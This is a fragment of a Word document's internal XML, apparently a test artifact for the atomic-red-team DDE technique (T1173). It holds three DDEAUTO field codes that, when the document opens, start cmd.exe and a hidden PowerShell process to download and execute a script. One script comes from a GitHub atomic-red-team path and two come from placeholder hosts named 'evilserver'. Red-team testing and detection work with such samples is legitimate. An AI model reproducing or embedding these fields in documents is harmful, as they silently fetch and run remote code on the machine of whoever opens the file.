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CB" w:rsidRDefault="0061022B">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00AE59F9" w:rsidRPr="00AE59F9">
        <w:instrText>DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('https://github.com/apbeers/atomic-red-team/tree/master/atomics/T1173/s</w:instrText>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidR="00AE59F9" w:rsidRPr="00AE59F9">
        <w:instrText>rc/PowerShell_Script_For_DDE_Document.ps1');powershell -e $e "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  <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334" w:rsidRPr="00D40334">
        <w:instrText>System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.</w:instrText>
      </w:r>
      <w:r w:rsidR="0058379E">
        <w:instrText>asdfasfd</w:instrText>
      </w:r>
      <w:r w:rsidR="0058379E" w:rsidRPr="00D40334">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334" w:rsidRPr="00D40334">
        <w:instrText>/pp.ps1');powershell -e $e "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidR="00D40334">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00A06E3F" w:rsidRPr="00A06E3F">
        <w:instrText>{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.nja/pp.ps1');powershell -e $e "}</w:instrText>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r w:rsidR="008916A7">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="008E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24"/>
    <w:rsid w:val="00443B24"/>
    <w:rsid w:val="004E516D"/>
    <w:rsid w:val="0058379E"/>
    <w:rsid w:val="0061022B"/>
    <w:rsid w:val="008916A7"/>
    <w:rsid w:val="008E54CB"/>
    <w:rsid w:val="00A06E3F"/>
    <w:rsid w:val="00AE59F9"/>
    <w:rsid w:val="00D4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CE67"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{213B2B6A-A2C2-416B-A482-0981E51B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2019-11-11T22:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-11T22:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>